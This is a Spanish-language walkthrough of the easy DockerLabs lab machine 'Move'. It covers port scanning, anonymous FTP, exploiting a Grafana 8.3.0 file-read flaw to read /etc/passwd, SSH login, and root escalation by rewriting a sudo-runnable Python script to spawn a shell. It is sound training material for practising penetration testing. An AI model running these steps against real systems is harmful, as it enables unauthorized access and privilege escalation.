Move

Introducción

En este artículo se documenta la resolución de la máquina virtual Move, diseñada por El Pingüino de Mario y clasificada con un nivel de dificultad fácil. Se aborda de forma estructurada cada etapa del proceso: reconocimiento, explotación y escalada de privilegios.

Información de la Máquina Virtual

• Nombre: Move
• Autor: El Pingüino de Mario
• Dificultad: Fácil
• Fecha de creación: 30/06/2024

Paso 0: Instalación y Despliegue

1. Descargamos la máquina desde DockerLabs.

2. Descomprimimos el archivo:

   unzip Move.zip

3. Ejecutamos el script de despliegue:

   sudo bash auto_deplo.sh Move.tar

Paso 1: Reconocimiento

Identificación de la IP

Al iniciar la máquina, se muestra directamente su dirección IP, por lo que no es necesario realizar un escaneo ARP.

Configuramos el entorno de trabajo:

mkdir Move
cd Move
mkt  # Crea las carpetas: content, exploits, nmap, scripts

Escaneo de Puertos

Ejecutamos un escaneo de puertos completo con Nmap:

nmap -p- --open -sS --min-rate 5000 -vvv -n -Pn 172.17.0.2 -oG allPorts

Extraemos los puertos abiertos:

extractPorts allPorts

Puertos detectados:

• 21 (FTP)
• 22 (SSH)
• 80 (HTTP)
• 3000 (HTTP)

Detección de Servicios

Lanzamos un escaneo específico de servicios:

nmap -sCV -p21,22,80,3000 172.17.0.2 -oN targeted

Enumeración FTP (Puerto 21)

Se permite el acceso anónimo vía FTP. Al conectarnos encontramos un archivo accesible:

Lo descargamos para su análisis posterior.

Enumeración Web (Puerto 80)

Realizamos un escaneo con gobuster:

gobuster dir -u http://172.17.0.2/ \
  -w /usr/share/seclists/Discovery/Web-Content/directory-list-lowercase-2.3-medium.txt \
  -x php,html,txt,js -t 200

Rutas detectadas:

• index.html: página por defecto de Apache.
• maintenance.html: contiene una pista sobre la ubicación de un archivo.

Enumeración Web (Puerto 3000)

La interfaz en el puerto 3000 corresponde a una instalación de Grafana:

Paso 2: Explotación

Grafana expone una versión vulnerable (v8.3.0), susceptible a lectura arbitraria de archivos. Buscamos el exploit correspondiente en ExploitDB y lo ejecutamos para comprobar la vulnerabilidad.

Se confirma que podemos leer archivos del sistema, como /etc/passwd, donde identificamos al usuario freddy.

Luego, analizamos el archivo encontrado previamente por FTP y referenciado en maintenance.html:

Este contiene la contraseña de freddy, lo que nos permite acceder vía SSH:

ssh freddy@172.17.0.2

Paso 3: Escalada de Privilegios

Revisión de privilegios Sudo

Ejecutamos:

sudo -l

El usuario freddy puede ejecutar /opt/maintenance.py como superusuario con python3.

Escalada con Python

Inspeccionamos el archivo para comprobar si es editable:

Modificamos su contenido para invocar una shell con privilegios de root:

import os
os.system("/bin/bash")

Luego lo ejecutamos:

sudo python3 /opt/maintenance.py

Obtenemos acceso como root:

Conclusión

La máquina Move combina técnicas clásicas de enumeración y explotación: acceso anónimo vía FTP, explotación de Grafana para lectura de archivos, y escalada mediante un script Python ejecutable como root. Es una máquina ideal para practicar vectores comunes en entornos de red interna y pruebas de post-explotación.